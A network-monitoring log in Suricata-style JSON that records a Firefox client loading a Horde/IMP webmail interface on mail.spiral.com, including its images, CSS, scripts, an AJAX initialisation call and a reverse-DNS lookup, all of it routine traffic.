{"timestamp":"2020-02-29T00:01:17.380615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.380967+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.383893+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.384497+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:01:17.386531+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} {"timestamp":"2020-02-29T00:01:17.387940+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:01:17.389643+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":7}} {"timestamp":"2020-02-29T00:01:17.390218+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.395134+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.396041+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:01:17.396672+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.397130+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.398639+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} {"timestamp":"2020-02-29T00:01:17.405089+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:01:17.411548+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:01:17.412209+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":9}} {"timestamp":"2020-02-29T00:01:17.412923+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:01:17.421392+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5592,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:17.442042+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:01:17.446781+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":10}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.654438+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.655898+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:01:17.656035+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":10}} {"timestamp":"2020-02-29T00:01:17.658172+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.672130+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:01:17.674459+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":13}} {"timestamp":"2020-02-29T00:01:17.683138+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:01:17.685104+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:01:17.685273+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":14}} {"timestamp":"2020-02-29T00:01:17.686251+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:01:17.686434+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.688181+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:01:17.688705+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} {"timestamp":"2020-02-29T00:01:17.689101+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.689842+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:01:17.690769+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:01:17.691700+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":13}} {"timestamp":"2020-02-29T00:01:17.692989+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":16}} {"timestamp":"2020-02-29T00:01:17.733381+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:01:17.737302+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} 